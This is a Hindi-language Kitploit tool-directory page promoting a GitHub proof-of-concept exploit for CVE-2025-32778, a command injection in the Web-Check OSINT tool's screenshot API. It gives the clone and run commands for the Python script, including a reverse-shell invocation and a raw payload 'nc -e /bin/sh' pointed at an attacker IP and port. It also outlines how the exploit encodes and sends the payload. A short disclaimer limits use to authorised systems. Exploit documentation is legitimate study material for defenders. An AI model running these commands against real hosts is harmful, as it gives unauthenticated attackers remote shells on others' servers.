Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32778 — CVE-2025-32778 के लिए PoC एक्सप्लॉइट: Web-Check OSINT टूल में कमांड इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/00xcanelo/cve-2025-32778
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

CVE-2025-32778 के लिए PoC एक्सप्लॉइट: Web-Check OSINT टूल में कमांड इंजेक्शन

रिपॉजिटरी देखें
31491 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32778 - Web-Check कमांड इंजेक्शन शोषण

Critical Language: Python

विवरण

CVE-2025-32778 एक गंभीर कमांड इंजेक्शन भेद्यता है Web-Check OSINT टूल में, जो Lissy93 द्वारा बनाया गया है।
यह अप्रमाणित हमलावरों को स्क्रीनशॉट API में url पैरामीटर के माध्यम से मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है।

यह Python स्क्रिप्ट शोषण को स्वचालित करती है और रिवर्स शेल उत्पन्न कर सकती है या कस्टम शेल पेलोड स्वीकार कर सकती है।


चेतावनी

  • केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आप अधिकृत हैं।
  • अनधिकृत उपयोग अवैध और अनैतिक है।

विशेषताएँ

  • Web-Check में url कमांड इंजेक्शन का शोषण करें।
  • समर्थन करता है:
  • --lhost और --lport के साथ रिवर्स शेल।
  • --shell के माध्यम से कस्टम शेल।
  • URL सामान्यीकरण।
  • --shell को --lhost/--lport के साथ संयोजित करने से रोकता है।

  • आवश्यकताएँ

    • Python 3.x
    • Requests लाइब्रेरी:
    root@kitploit:~
    pip install requests
    

    उपयोग

    root@kitploit:~
    git clone https://github.com/00xCanelo/CVE-2025-32778
    cd CVE-2025-32778
    

    टूल को रिवर्स शेल बनाने दें

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
    

    कस्टम शेल पेलोड (कच्चा)

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
    

    सहायता मेनू

    root@kitploit:~
    python3 cve-2025-32778.py -h
    

    यह कैसे काम करता है

    1. लक्ष्य URL को scheme://host[:port] में सामान्यीकृत करें।

    2. पेलोड तैयार करें:

      • --lhost और --lport का उपयोग करके रिवर्स शेल उत्पन्न करें।
      • या --shell के साथ एक कच्चा शेल कमांड का उपयोग करें।
    3. सुरक्षित URL इंजेक्शन के लिए शेल पेलोड को एनकोड करें।

    4. पेलोड के साथ /api/screenshot/ पर एक HTTP GET अनुरोध भेजें।

    5. रिवर्स शेल कनेक्शन की प्रतीक्षा करें।


    🧑‍💻 लेखक

    00xCanelo
    GitHub Profile


    संदर्भ

    • Web-Check GitHub Repository – मूल प्रोजेक्ट जिसमें भेद्य कोड शामिल है।
    • CVE-2025-32778 – CVE प्रविष्टि जो कमांड इंजेक्शन भेद्यता का वर्णन करती है।
    टूल डाउनलोड करें